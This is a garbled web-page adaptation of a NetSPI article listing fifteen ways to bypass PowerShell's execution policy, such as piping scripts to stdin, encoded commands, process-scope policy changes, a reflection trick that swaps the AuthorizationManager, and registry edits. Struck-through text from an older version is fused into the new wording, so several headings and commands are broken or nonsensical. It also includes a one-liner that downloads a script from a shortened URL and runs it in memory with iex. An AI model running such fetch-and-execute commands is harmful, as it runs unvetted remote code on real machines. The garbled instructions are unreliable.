Bypass the PowerShell Execution Policy

💻 15 Ways to Bypass the PowerShell Execution Policy

~~Based on the original by~~Author: Scott Sutherland
Source: (NetSPI)

🔎 What is the PowerShell Execution Policy?

~~PowerShell’s~~The execution policy ~~restricts~~determines ~~script~~what type of PowerShell scripts (if any) can run. By default, it's set to Restricted, which blocks all scripts. It's meant to prevent accidental execution, ~~but~~not ~~these~~as ~~methods~~a ~~allow~~true ~~you~~security control — which is why it’s easy to ~~bypass~~bypass.

💡 withoutWhy needingBypass adminIt?

~~rights.~~

PowerShell is native to Windows Can interact with the Windows API Can run in memory (no disk writes) Often trusted by whitelisting tools Used in many open-source pentest frameworks

🔍 View Current Execution Policy

Get-ExecutionPolicy
Get-ExecutionPolicy -List | Format-Table -AutoSize

🧪 QuickTest MethodsScript withExample

~~Examples~~

Write-Host "My voice is my passport, verify me."

---

🚪 15 Ways to Bypass Execution Policy

Paste ~~directly~~in Interactive Console
Directly run the script in ~~the~~PowerShell. ~~console~~
~~Policies~~No ~~don’t~~config ~~apply~~changes toor ~~manually~~file ~~typed commands.~~writes.

Echo ~~& pipe~~ to PowerShell

echo Write-Host "Hi"My \voice is my passport" | powershell -noprofile -
Executes

~~via stdin.~~

Pipe aFile ~~script~~via ~~file~~Type/Get-Content

Get-Content script..\runme.ps1 \| powershell -noprofile -
Reads

~~line-by-line~~

type as.\runme.ps1 input.| powershell -noprofile -

Download ~~and~~+ ~~execute in memory~~Invoke-Expression

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL'https://bit.ly/1kEgbuH')"
No

~~file written to disk.~~

Use -Command ~~argument~~Switch

powershell -command "Write-Host 'Bypass'Hello'"
Executes

~~inline commands.~~

Use -EncodedCommand

$cmd = "Write-Host 'Hello'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
[Convert]::ToBase64String($bytes)

Then run with:
powershell -EncodedCommand argument<base64>

Invoke-Command

Invoke-Command -ScriptBlock {Write-Host "Hello"}

~~Base64-encoded~~Can ~~string~~also ~~passed~~pull ~~directly~~policy tofrom ~~PowerShell.~~a remote host:

Invoke-Command -ComputerName server -ScriptBlock {Get-ExecutionPolicy} | Set-ExecutionPolicy -Force

Invoke-Expression (iex)

Get-Content .\runme.ps1 | Invoke-Expression

gc .\runme.ps1 | iex

Use -ExecutionPolicy Bypass

powershell -ExecutionPolicy Bypass -File .\runme.ps1

Use -ExecutionPolicy Unrestricted

powershell -ExecutionPolicy UnRestricted -File .\runme.ps1

Use -ExecutionPolicy RemoteSigned

powershell -ExecutionPolicy RemoteSigned -File .\runme.ps1

Swap AuthorizationManager (Temporary)


function Disable-ExecutionPolicy {
  ($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue(
  $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue(
  $ctx, (New-Object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))
}
Disable-ExecutionPolicy

Set ~~execution~~Policy ~~policy~~for ~~in session~~Process

Set-ExecutionPolicy Bypass -Scope Process

Only ~~affects~~for ~~current~~this session. ~~Use~~Set ~~PowerShell~~Policy ~~ISE~~for Current User

powershell_ise.exeSet-ExecutionPolicy script.ps1-Scope CurrentUser -ExecutionPolicy UnRestricted
Sometimes

~~bypasses policy.~~ ~~Rename~~Edit ~~script~~Registry tofor ~~.txt~~Current User
~~Read~~ ~~and~~

Modify:

~~run~~HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
~~manually;~~

Add/modify ~~avoids~~string ~~.ps1~~value ~~enforcement.~~

ExecutionPolicy WMI= execution
RunsUnrestricted

~~PowerShell remotely via Win32_Process.~~ ~~Scheduled task~~
~~Create task to run your script.~~ ~~PowerShell remoting~~
~~Executes on remote systems; local policy may not apply.~~ ~~Inject via DLL (advanced)~~
~~Loads PowerShell engine directly in memory.~~ ~~Invoke from MSHTA or wscript~~
~~Uses alternate script hosts to trigger PowerShell.~~ ~~Use trusted software to execute~~
~~Hijack or abuse applications that run PowerShell under the hood.~~

---

✅ Wrap Up

~~Note:~~PowerShell’s ~~These~~execution ~~methods~~policy ~~are~~is a soft restriction — not a security boundary. Microsoft even provides native ways to bypass it. Use these techniques for legitimate ~~use only — such as~~ automation, testing, and ~~red~~administration.

~~teaming~~

Adapted from NetSPI — ~~where~~original ~~authorized.~~blog post